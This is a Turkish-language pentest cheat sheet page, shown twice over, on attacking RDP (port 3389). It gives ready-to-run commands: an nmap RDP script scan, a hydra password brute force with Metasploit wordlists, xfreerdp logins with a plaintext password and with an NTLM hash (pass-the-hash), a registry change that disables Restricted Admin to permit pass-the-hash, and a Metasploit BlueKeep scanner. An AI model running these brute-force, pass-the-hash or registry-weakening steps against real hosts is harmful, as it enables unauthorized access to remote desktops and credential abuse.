RDP - 3389

Nmap Scan

nmap -sV -sC 10.129.201.248 -p3389 --script rdp*

Brute Force

hydra -L /usr/share/metasploit-framework/data/wordlists/unix_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt rdp://192.168.1.3 -s 3389

Bağlantı

remmina
xfreerdp /u:administrator /p:password123 /v:192.168.1.3:3389
xfreerdp /v:192.168.220.152 /u:administrator /pth:300FF5E89EF33F83A8146C10F5AB9BB9



xfreerdp3 /v:192.168.1.3 /u:john /p:'pass123' /d:corp.local +dynamic-resolution /drive:server,/root/Desktop/server

Pass The Hash

Default olarak RDP protokolüne ntlm ile bağlanamayız. Alttaki registery ile bu açılabilir

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

CVE-2019-0708 (BlueKeep)

msfconsole
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set RHOSTS 192.168.1.3
set RPORT 3389
run

PreviousMySQL - 3306 NextPostgresql - 5432

Last updated 2 months ago

Was this helpful?

RDP - 3389

Nmap Scan

nmap -sV -sC 10.129.201.248 -p3389 --script rdp*

Brute Force

hydra -L /usr/share/metasploit-framework/data/wordlists/unix_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt rdp://192.168.1.3 -s 3389

Bağlantı

remmina
xfreerdp /u:administrator /p:password123 /v:192.168.1.3:3389
xfreerdp /v:192.168.220.152 /u:administrator /pth:300FF5E89EF33F83A8146C10F5AB9BB9



xfreerdp3 /v:192.168.1.3 /u:john /p:'pass123' /d:corp.local +dynamic-resolution /drive:server,/root/Desktop/server

Pass The Hash

Default olarak RDP protokolüne ntlm ile bağlanamayız. Alttaki registery ile bu açılabilir

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

CVE-2019-0708 (BlueKeep)

msfconsole
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set RHOSTS 192.168.1.3
set RPORT 3389
run

PreviousMySQL - 3306 NextPostgresql - 5432

Last updated 2 months ago

Was this helpful?